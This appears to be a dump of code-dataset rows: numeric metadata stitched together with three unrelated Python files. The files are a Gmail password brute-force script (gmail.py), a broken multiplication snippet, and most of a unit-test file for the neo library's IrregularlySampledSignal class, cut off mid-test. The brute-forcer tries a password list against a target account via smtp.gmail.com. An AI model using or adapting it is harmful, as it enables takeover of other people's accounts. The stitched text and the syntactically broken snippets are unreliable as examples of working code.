| 25.229508 | 77 | 0.675763 | 443 | 3,078 | 4.654628 | 0.327314 | 0.023278 | 0.030553 | 0.047527 | 0.318623 | 0.260912 | 0.227934 | 0.13676 | 0.13676 | 0.100873 | 0 | 0.036205 | 0.219298 | 3,078 | 121 | 78 | 25.438017 | 0.821889 | 0.648798 | 0 | 0.2 | 0 | 0 | 0.310875 | 0.286052 | 0 | 0 | 0 | 0.016529 | 0 | 1 | 0.24 | false | 0.2 | 0.08 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
0aeea2abe861dcfc38b00218cc263c0a631c1760 | 1,674 | py | Python | gmail.py | NH-web/NH-gmail | 17ff1eadabca534da8bda8761445418f18f14c30 | [
"Apache-2.0"
] | 2 | 2020-10-11T14:53:21.000Z | 2022-01-02T12:49:21.000Z | gmail.py | NH-web/NH-gmail | 17ff1eadabca534da8bda8761445418f18f14c30 | [
"Apache-2.0"
] | null | null | null | gmail.py | NH-web/NH-gmail | 17ff1eadabca534da8bda8761445418f18f14c30 | [
"Apache-2.0"
] | null | null | null | import smtplib
import time
import subprocess
from datetime import datetime
r = "033[1;91m"
g = "033[1;32m"
s = g + "+"
print (g +'-'*60)
print ("")
print ('['+s+']starting your tool and updating the programm')
print ("")
print (g +'-'*60)
time.sleep(5)
print (g'/...\.....starting the server' + g +'/....//../'*1000)
subprocess.call('clear',SHELL=True)
while True:
print ('play song for more motivation!......')
subprocess.call("play-audio 'Eminem_-_Escape_feat._Hopsin_(2019)(360p).mp3'",SHELL=True)
print ('now let-us start.....')
def usage():
print ('USAGE: python gmail.py <GMAIL> <PASSLIST>')
print (' {{{{{ }}}}} ')
print (' {{{{ }}}} ')
print (' {{{{ NNNNNNNN NNNN HHHH HHHH }}}} ')
print (' {{{{ NNNNNNNNN NNNN HHHH HHHH }}}} ')
print ('{{{{ NNNNN NNNN NNNN HHHHHHHHHHH }}}} ')
print (' {{{{ NNNNN NNNN NNNN HHHHHHHHHHH }}}} ')
print (' {{{{ NNNNN NNNNNNNN HHHH HHHH }}}} ')
print (' {{{{{ NNNNN NNNNNNN HHHH HHHH }}}} ')
print (' {{{{{{ }}}}} ')
target = str(sys.argv[1])
passw = str(sys.argv[2])
s = smtplib.SMTP('smtp.gmail.com',587)
def start():
for password in passw:
try:
passww = s.login(target,password)
t1 = datetime.now()
print ('started at:{0}'.format(t1))
print ('[+]password Found:%s'%passww)
except:
print ('[-]Attempting password:%s'%password)
print (len(sys.argv))
if len(sys.argv) != 3:
usage()
else:
start()
t2 = datetime.now()
total = t2 - t1
print ('finished in :{0}'.format(total))
| 27.9 | 92 | 0.519713 | 193 | 1,674 | 4.481865 | 0.466321 | 0.046243 | 0.060116 | 0.039306 | 0.078613 | 0.078613 | 0.078613 | 0 | 0 | 0 | 0 | 0.034426 | 0.271207 | 1,674 | 59 | 93 | 28.372881 | 0.67459 | 0 | 0 | 0.16 | 0 | 0 | 0.449492 | 0.028093 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.12 | 0.08 | null | null | 0.46 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 3 |
7c145f3f4175223e4ff7a27b6305b695ba73a77b | 136 | py | Python | multiplication/multiplication.py | Vino2001-hub/the-creative-vipers | 844c20e7f8dc6a69f64c17fba29d385b5dd21868 | [
"MIT"
] | null | null | null | multiplication/multiplication.py | Vino2001-hub/the-creative-vipers | 844c20e7f8dc6a69f64c17fba29d385b5dd21868 | [
"MIT"
] | null | null | null | multiplication/multiplication.py | Vino2001-hub/the-creative-vipers | 844c20e7f8dc6a69f64c17fba29d385b5dd21868 | [
"MIT"
] | 3 | 2021-04-18T14:20:45.000Z | 2021-04-18T15:12:42.000Z | def domultiplication:
a=68
b=10
print("Multiplication of 68*10=",a*b)#multiplication function is invoked
domultiplication()
| 22.666667 | 76 | 0.727941 | 18 | 136 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070796 | 0.169118 | 136 | 5 | 77 | 27.2 | 0.80531 | 0.25 | 0 | 0 | 0 | 0 | 0.237624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.2 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
7c1a4a7821a91fb68ddce6a8ad71199b67b52d2a | 47,543 | py | Python | neo/test/coretest/test_irregularysampledsignal.py | alafuzof/python-neo | 5fae976d1d944bf16285dc51f57d0e7d4c2c62ad | [
"BSD-3-Clause"
] | null | null | null | neo/test/coretest/test_irregularysampledsignal.py | alafuzof/python-neo | 5fae976d1d944bf16285dc51f57d0e7d4c2c62ad | [
"BSD-3-Clause"
] | null | null | null | neo/test/coretest/test_irregularysampledsignal.py | alafuzof/python-neo | 5fae976d1d944bf16285dc51f57d0e7d4c2c62ad | [
"BSD-3-Clause"
] | 1 | 2021-07-17T16:24:25.000Z | 2021-07-17T16:24:25.000Z | # -*- coding: utf-8 -*-
"""
Tests of the neo.core.irregularlysampledsignal.IrregularlySampledSignal class
"""
import unittest
import os
import pickle
import warnings
from copy import deepcopy
import numpy as np
import quantities as pq
from numpy.testing import assert_array_equal
from neo.core.dataobject import ArrayDict
try:
from IPython.lib.pretty import pretty
except ImportError as err:
HAVE_IPYTHON = False
else:
HAVE_IPYTHON = True
from neo.core.irregularlysampledsignal import IrregularlySampledSignal
from neo.core import Segment, ChannelIndex
from neo.core.baseneo import MergeError
from neo.test.tools import (assert_arrays_almost_equal, assert_arrays_equal,
assert_neo_object_is_compliant, assert_same_sub_schema,
assert_same_attributes, assert_same_annotations,
assert_same_array_annotations)
from neo.test.generate_datasets import (get_fake_value, get_fake_values, fake_neo,
TEST_ANNOTATIONS)
class Test__generate_datasets(unittest.TestCase):
def setUp(self):
np.random.seed(0)
self.annotations = dict(
[(str(x), TEST_ANNOTATIONS[x]) for x in range(len(TEST_ANNOTATIONS))])
def test__get_fake_values(self):
self.annotations['seed'] = 0
times = get_fake_value('times', pq.Quantity, seed=0, dim=1)
signal = get_fake_value('signal', pq.Quantity, seed=1, dim=2)
name = get_fake_value('name', str, seed=2, obj=IrregularlySampledSignal)
description = get_fake_value('description', str, seed=3, obj='IrregularlySampledSignal')
file_origin = get_fake_value('file_origin', str)
arr_ann = get_fake_value('array_annotations', dict, seed=5,
obj=IrregularlySampledSignal, n=1)
attrs1 = {'name': name, 'description': description, 'file_origin': file_origin}
attrs2 = attrs1.copy()
attrs2.update(self.annotations)
attrs2['array_annotations'] = arr_ann
res11 = get_fake_values(IrregularlySampledSignal, annotate=False, seed=0)
res12 = get_fake_values('IrregularlySampledSignal', annotate=False, seed=0)
res21 = get_fake_values(IrregularlySampledSignal, annotate=True, seed=0)
res22 = get_fake_values('IrregularlySampledSignal', annotate=True, seed=0)
assert_array_equal(res11.pop('times'), times)
assert_array_equal(res12.pop('times'), times)
assert_array_equal(res21.pop('times'), times)
assert_array_equal(res22.pop('times'), times)
assert_array_equal(res11.pop('signal'), signal)
assert_array_equal(res12.pop('signal'), signal)
assert_array_equal(res21.pop('signal'), signal)
assert_array_equal(res22.pop('signal'), signal)
self.assertEqual(res11, attrs1)
self.assertEqual(res12, attrs1)
# Array annotations need to be compared separately
# because numpy arrays define equality differently
arr_ann_res21 = res21.pop('array_annotations')
arr_ann_attrs2 = attrs2.pop('array_annotations')
self.assertEqual(res21, attrs2)
assert_arrays_equal(arr_ann_res21['valid'], arr_ann_attrs2['valid'])
assert_arrays_equal(arr_ann_res21['number'], arr_ann_attrs2['number'])
arr_ann_res22 = res22.pop('array_annotations')
self.assertEqual(res22, attrs2)
assert_arrays_equal(arr_ann_res22['valid'], arr_ann_attrs2['valid'])
assert_arrays_equal(arr_ann_res22['number'], arr_ann_attrs2['number'])
def test__fake_neo__cascade(self):
self.annotations['seed'] = None
obj_type = IrregularlySampledSignal
cascade = True
res = fake_neo(obj_type=obj_type, cascade=cascade)
self.assertTrue(isinstance(res, IrregularlySampledSignal))
assert_neo_object_is_compliant(res)
self.assertEqual(res.annotations, self.annotations)
def test__fake_neo__nocascade(self):
self.annotations['seed'] = None
obj_type = 'IrregularlySampledSignal'
cascade = False
res = fake_neo(obj_type=obj_type, cascade=cascade)
self.assertTrue(isinstance(res, IrregularlySampledSignal))
assert_neo_object_is_compliant(res)
self.assertEqual(res.annotations, self.annotations)
class TestIrregularlySampledSignalConstruction(unittest.TestCase):
def test_IrregularlySampledSignal_creation_times_units_signal_units(self):
params = {'test2': 'y1', 'test3': True}
arr_ann = {'anno1': [23], 'anno2': ['A']}
sig = IrregularlySampledSignal([1.1, 1.5, 1.7] * pq.ms, signal=[20., 40., 60.] * pq.mV,
name='test', description='tester', file_origin='test.file',
test1=1, array_annotations=arr_ann, **params)
sig.annotate(test1=1.1, test0=[1, 2])
assert_neo_object_is_compliant(sig)
assert_array_equal(sig.times, [1.1, 1.5, 1.7] * pq.ms)
assert_array_equal(np.asarray(sig).flatten(), np.array([20., 40., 60.]))
self.assertEqual(sig.units, pq.mV)
self.assertEqual(sig.name, 'test')
self.assertEqual(sig.description, 'tester')
self.assertEqual(sig.file_origin, 'test.file')
self.assertEqual(sig.annotations['test0'], [1, 2])
self.assertEqual(sig.annotations['test1'], 1.1)
self.assertEqual(sig.annotations['test2'], 'y1')
self.assertTrue(sig.annotations['test3'])
assert_arrays_equal(sig.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(sig.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(sig.array_annotations, ArrayDict)
def test_IrregularlySampledSignal_creation_units_arg(self):
params = {'test2': 'y1', 'test3': True}
arr_ann = {'anno1': [23], 'anno2': ['A']}
sig = IrregularlySampledSignal([1.1, 1.5, 1.7], signal=[20., 40., 60.], units=pq.V,
time_units=pq.s, name='test', description='tester',
file_origin='test.file', test1=1,
array_annotations=arr_ann, **params)
sig.annotate(test1=1.1, test0=[1, 2])
assert_neo_object_is_compliant(sig)
assert_array_equal(sig.times, [1.1, 1.5, 1.7] * pq.s)
assert_array_equal(np.asarray(sig).flatten(), np.array([20., 40., 60.]))
self.assertEqual(sig.units, pq.V)
self.assertEqual(sig.name, 'test')
self.assertEqual(sig.description, 'tester')
self.assertEqual(sig.file_origin, 'test.file')
self.assertEqual(sig.annotations['test0'], [1, 2])
self.assertEqual(sig.annotations['test1'], 1.1)
self.assertEqual(sig.annotations['test2'], 'y1')
self.assertTrue(sig.annotations['test3'])
assert_arrays_equal(sig.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(sig.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(sig.array_annotations, ArrayDict)
def test_IrregularlySampledSignal_creation_units_rescale(self):
params = {'test2': 'y1', 'test3': True}
arr_ann = {'anno1': [23], 'anno2': ['A']}
sig = IrregularlySampledSignal([1.1, 1.5, 1.7] * pq.s, signal=[2., 4., 6.] * pq.V,
units=pq.mV, time_units=pq.ms, name='test',
description='tester', file_origin='test.file', test1=1,
array_annotations=arr_ann, **params)
sig.annotate(test1=1.1, test0=[1, 2])
assert_neo_object_is_compliant(sig)
assert_array_equal(sig.times, [1100, 1500, 1700] * pq.ms)
assert_array_equal(np.asarray(sig).flatten(), np.array([2000., 4000., 6000.]))
self.assertEqual(sig.units, pq.mV)
self.assertEqual(sig.name, 'test')
self.assertEqual(sig.description, 'tester')
self.assertEqual(sig.file_origin, 'test.file')
self.assertEqual(sig.annotations['test0'], [1, 2])
self.assertEqual(sig.annotations['test1'], 1.1)
self.assertEqual(sig.annotations['test2'], 'y1')
self.assertTrue(sig.annotations['test3'])
assert_arrays_equal(sig.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(sig.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(sig.array_annotations, ArrayDict)
def test_IrregularlySampledSignal_different_lens_ValueError(self):
times = [1.1, 1.5, 1.7] * pq.ms
signal = [20., 40., 60., 70.] * pq.mV
self.assertRaises(ValueError, IrregularlySampledSignal, times, signal)
def test_IrregularlySampledSignal_no_signal_units_ValueError(self):
times = [1.1, 1.5, 1.7] * pq.ms
signal = [20., 40., 60.]
self.assertRaises(ValueError, IrregularlySampledSignal, times, signal)
def test_IrregularlySampledSignal_no_time_units_ValueError(self):
times = [1.1, 1.5, 1.7]
signal = [20., 40., 60.] * pq.mV
self.assertRaises(ValueError, IrregularlySampledSignal, times, signal)
class TestIrregularlySampledSignalProperties(unittest.TestCase):
def setUp(self):
self.times = [np.arange(10.0) * pq.s, np.arange(-100.0, 100.0, 10.0) * pq.ms,
np.arange(100) * pq.ns]
self.data = [np.arange(10.0) * pq.nA, np.arange(-100.0, 100.0, 10.0) * pq.mV,
np.random.uniform(size=100) * pq.uV]
self.signals = [IrregularlySampledSignal(t, signal=D, testattr='test') for D, t in
zip(self.data, self.times)]
def test__compliant(self):
for signal in self.signals:
assert_neo_object_is_compliant(signal)
def test__t_start_getter(self):
for signal, times in zip(self.signals, self.times):
self.assertAlmostEqual(signal.t_start, times[0], delta=1e-15)
def test__t_stop_getter(self):
for signal, times in zip(self.signals, self.times):
self.assertAlmostEqual(signal.t_stop, times[-1], delta=1e-15)
def test__duration_getter(self):
for signal, times in zip(self.signals, self.times):
self.assertAlmostEqual(signal.duration, times[-1] - times[0], delta=1e-15)
def test__sampling_intervals_getter(self):
for signal, times in zip(self.signals, self.times):
assert_arrays_almost_equal(signal.sampling_intervals, np.diff(times), threshold=1e-15)
def test_IrregularlySampledSignal_repr(self):
sig = IrregularlySampledSignal([1.1, 1.5, 1.7] * pq.s, signal=[2., 4., 6.] * pq.V,
name='test', description='tester', file_origin='test.file',
test1=1)
assert_neo_object_is_compliant(sig)
if np.__version__.split(".")[:2] > ['1', '13']:
# see https://github.com/numpy/numpy/blob/master/doc/release/1.14.0-notes.rst#many
# -changes-to-array-printing-disableable-with-the-new-legacy-printing-mode
targ = (
'<IrregularlySampledSignal(array([[2.],\n [4.],\n [6.]]) * V '
'' + 'at times [1.1 1.5 1.7] s)>')
else:
targ = (
'<IrregularlySampledSignal(array([[ 2.],\n [ 4.],\n [ 6.]]) '
'* V ' + 'at times [ 1.1 1.5 1.7] s)>')
res = repr(sig)
self.assertEqual(targ, res)
class TestIrregularlySampledSignalArrayMethods(unittest.TestCase):
def setUp(self):
self.data1 = np.arange(10.0)
self.data1quant = self.data1 * pq.mV
self.time1 = np.logspace(1, 5, 10)
self.time1quant = self.time1 * pq.ms
self.arr_ann = {'anno1': [23], 'anno2': ['A']}
self.signal1 = IrregularlySampledSignal(self.time1quant, signal=self.data1quant,
name='spam', description='eggs',
file_origin='testfile.txt', arg1='test',
array_annotations=self.arr_ann)
self.signal1.segment = Segment()
self.signal1.channel_index = ChannelIndex([0])
def test__compliant(self):
assert_neo_object_is_compliant(self.signal1)
self.assertEqual(self.signal1.name, 'spam')
self.assertEqual(self.signal1.description, 'eggs')
self.assertEqual(self.signal1.file_origin, 'testfile.txt')
self.assertEqual(self.signal1.annotations, {'arg1': 'test'})
assert_arrays_equal(self.signal1.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(self.signal1.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(self.signal1.array_annotations, ArrayDict)
def test__slice_should_return_IrregularlySampledSignal(self):
result = self.signal1[3:8]
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
self.assertEqual(result.size, 5)
self.assertEqual(result.t_start, self.time1quant[3])
self.assertEqual(result.t_stop, self.time1quant[7])
assert_array_equal(self.time1quant[3:8], result.times)
assert_array_equal(self.data1[3:8].reshape(-1, 1), result.magnitude)
# Test other attributes were copied over (in this case, defaults)
self.assertEqual(result.file_origin, self.signal1.file_origin)
self.assertEqual(result.name, self.signal1.name)
self.assertEqual(result.description, self.signal1.description)
self.assertEqual(result.annotations, self.signal1.annotations)
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test__getitem_should_return_single_quantity(self):
self.assertEqual(self.signal1[0], 0 * pq.mV)
self.assertEqual(self.signal1[9], 9 * pq.mV)
self.assertRaises(IndexError, self.signal1.__getitem__, 10)
def test__getitem_out_of_bounds_IndexError(self):
self.assertRaises(IndexError, self.signal1.__getitem__, 10)
def test_comparison_operators(self):
assert_array_equal(self.signal1 >= 5 * pq.mV, np.array(
[[False, False, False, False, False, True, True, True, True, True]]).T)
assert_array_equal(self.signal1 == 5 * pq.mV, np.array(
[[False, False, False, False, False, True, False, False, False, False]]).T)
assert_array_equal(self.signal1 == self.signal1, np.array(
[[True, True, True, True, True, True, True, True, True, True]]).T)
def test__comparison_as_indexing_single_trace(self):
self.assertEqual(self.signal1[self.signal1 == 5], [5 * pq.mV])
def test__comparison_as_indexing_multi_trace(self):
signal = IrregularlySampledSignal(self.time1quant, np.arange(20).reshape((-1, 2)) * pq.V)
assert_array_equal(signal[signal < 10],
np.array([[0, 2, 4, 6, 8], [1, 3, 5, 7, 9]]).T * pq.V)
def test__indexing_keeps_order_across_channels(self):
# AnalogSignals with 10 traces each having 5 samples (eg. data[0] = [0,10,20,30,40])
data = np.array([range(10), range(10, 20), range(20, 30), range(30, 40), range(40, 50)])
mask = np.full((5, 10), fill_value=False, dtype=bool)
# selecting one entry per trace
mask[[0, 1, 0, 3, 0, 2, 4, 3, 1, 4], range(10)] = True
signal = IrregularlySampledSignal(np.arange(5) * pq.s, np.array(data) * pq.V)
assert_array_equal(signal[mask], np.array([[0, 11, 2, 33, 4, 25, 46, 37, 18, 49]]) * pq.V)
def test__indexing_keeps_order_across_time(self):
# AnalogSignals with 10 traces each having 5 samples (eg. data[0] = [0,10,20,30,40])
data = np.array([range(10), range(10, 20), range(20, 30), range(30, 40), range(40, 50)])
mask = np.full((5, 10), fill_value=False, dtype=bool)
# selecting two entries per trace
temporal_ids = [0, 1, 0, 3, 1, 2, 4, 2, 1, 4] + [4, 3, 2, 1, 0, 1, 2, 3, 2, 1]
mask[temporal_ids, list(range(10)) + list(range(10))] = True
signal = IrregularlySampledSignal(np.arange(5) * pq.s, np.array(data) * pq.V)
assert_array_equal(signal[mask], np.array([[0, 11, 2, 13, 4, 15, 26, 27, 18, 19],
[40, 31, 22, 33, 14, 25, 46, 37, 28,
49]]) * pq.V)
def test__comparison_with_inconsistent_units_should_raise_Exception(self):
self.assertRaises(ValueError, self.signal1.__gt__, 5 * pq.nA)
def test_simple_statistics(self):
targmean = self.signal1[:-1] * np.diff(self.time1quant).reshape(-1, 1)
targmean = targmean.sum() / (self.time1quant[-1] - self.time1quant[0])
self.assertEqual(self.signal1.max(), 9 * pq.mV)
self.assertEqual(self.signal1.min(), 0 * pq.mV)
self.assertEqual(self.signal1.mean(), targmean)
def test_mean_interpolation_NotImplementedError(self):
self.assertRaises(NotImplementedError, self.signal1.mean, True)
def test_resample_NotImplementedError(self):
self.assertRaises(NotImplementedError, self.signal1.resample, True)
def test__rescale_same(self):
result = self.signal1.copy()
result = result.rescale(pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(result.units, 1 * pq.mV)
assert_array_equal(result.magnitude, self.data1.reshape(-1, 1))
assert_array_equal(result.times, self.time1quant)
assert_same_sub_schema(result, self.signal1)
self.assertIsInstance(result.channel_index, ChannelIndex)
self.assertIsInstance(result.segment, Segment)
self.assertIs(result.channel_index, self.signal1.channel_index)
self.assertIs(result.segment, self.signal1.segment)
def test__rescale_new(self):
result = self.signal1.copy()
result = result.rescale(pq.uV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
self.assertEqual(result.units, 1 * pq.uV)
assert_arrays_almost_equal(np.array(result), self.data1.reshape(-1, 1) * 1000., 1e-10)
assert_array_equal(result.times, self.time1quant)
self.assertIsInstance(result.channel_index, ChannelIndex)
self.assertIsInstance(result.segment, Segment)
self.assertIs(result.channel_index, self.signal1.channel_index)
self.assertIs(result.segment, self.signal1.segment)
def test__rescale_new_incompatible_ValueError(self):
self.assertRaises(ValueError, self.signal1.rescale, pq.nA)
def test_time_slice(self):
targdataquant = [[1.0], [2.0], [3.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[1:4] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = 250
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test__time_slice_deepcopy_annotations(self):
params1 = {'test0': 'y1', 'test1': ['deeptest'], 'test2': True}
self.signal1.annotate(**params1)
result = self.signal1.time_slice(None, None)
# Change annotations of original
params2 = {'test0': 'y2', 'test2': False}
self.signal1.annotate(**params2)
self.signal1.annotations['test1'][0] = 'shallowtest'
self.assertNotEqual(self.signal1.annotations['test0'], result.annotations['test0'])
self.assertNotEqual(self.signal1.annotations['test1'], result.annotations['test1'])
self.assertNotEqual(self.signal1.annotations['test2'], result.annotations['test2'])
# Change annotations of result
params3 = {'test0': 'y3'}
result.annotate(**params3)
result.annotations['test1'][0] = 'shallowtest2'
self.assertNotEqual(self.signal1.annotations['test0'], result.annotations['test0'])
self.assertNotEqual(self.signal1.annotations['test1'], result.annotations['test1'])
self.assertNotEqual(self.signal1.annotations['test2'], result.annotations['test2'])
def test__time_slice_deepcopy_array_annotations(self):
length = self.signal1.shape[-1]
params1 = {'test0': ['y{}'.format(i) for i in range(length)],
'test1': ['deeptest' for i in range(length)],
'test2': [(-1)**i > 0 for i in range(length)]}
self.signal1.array_annotate(**params1)
result = self.signal1.time_slice(None, None)
# Change annotations of original
params2 = {'test0': ['x{}'.format(i) for i in range(length)],
'test2': [(-1) ** (i + 1) > 0 for i in range(length)]}
self.signal1.array_annotate(**params2)
self.signal1.array_annotations['test1'][0] = 'shallowtest'
self.assertFalse(all(self.signal1.array_annotations['test0']
== result.array_annotations['test0']))
self.assertFalse(all(self.signal1.array_annotations['test1']
== result.array_annotations['test1']))
self.assertFalse(all(self.signal1.array_annotations['test2']
== result.array_annotations['test2']))
# Change annotations of result
params3 = {'test0': ['z{}'.format(i) for i in range(1, result.shape[-1]+1)]}
result.array_annotate(**params3)
result.array_annotations['test1'][0] = 'shallow2'
self.assertFalse(all(self.signal1.array_annotations['test0']
== result.array_annotations['test0']))
self.assertFalse(all(self.signal1.array_annotations['test1']
== result.array_annotations['test1']))
self.assertFalse(all(self.signal1.array_annotations['test2']
== result.array_annotations['test2']))
def test__time_slice_deepcopy_data(self):
result = self.signal1.time_slice(None, None)
# Change values of original array
self.signal1[2] = 7.3*self.signal1.units
self.assertFalse(all(self.signal1 == result))
# Change values of sliced array
result[3] = 9.5*result.units
self.assertFalse(all(self.signal1 == result))
def test_time_slice_out_of_boundries(self):
targdataquant = self.data1quant
targtimequant = self.time1quant
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 0
t_stop = 2500000
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_empty(self):
targdataquant = [] * pq.mV
targtimequant = [] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = 250
result = targ_signal.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
self.assertEqual(result.array_annotations, {})
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_none_stop(self):
targdataquant = [[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0], [9.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[1:10] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = 15
t_stop = None
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_none_start(self):
targdataquant = [[0.0], [1.0], [2.0], [3.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[0:4] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = None
t_stop = 250
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_none_both(self):
targdataquant = [[0.0], [1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0],
[9.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[0:10] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
description='eggs', file_origin='testfile.txt',
arg1='test')
t_start = None
t_stop = None
result = self.signal1.time_slice(t_start, t_stop)
assert_array_equal(result, targ_signal)
assert_array_equal(result.times, targtimequant)
self.assertEqual(result.units, 1 * pq.mV)
self.assertIsInstance(result, IrregularlySampledSignal)
assert_neo_object_is_compliant(result)
self.assertEqual(result.name, 'spam')
self.assertEqual(result.description, 'eggs')
self.assertEqual(result.file_origin, 'testfile.txt')
self.assertEqual(result.annotations, {'arg1': 'test'})
assert_arrays_equal(result.array_annotations['anno1'], np.array([23]))
assert_arrays_equal(result.array_annotations['anno2'], np.array(['A']))
self.assertIsInstance(result.array_annotations, ArrayDict)
def test_time_slice_differnt_units(self):
targdataquant = [[1.0], [2.0], [3.0]] * pq.mV
targtime = np.logspace(1, 5, 10)
targtimequant = targtime[1:4] * pq.ms
targ_signal = IrregularlySampledSignal(targtimequant, signal=targdataquant, name='spam',
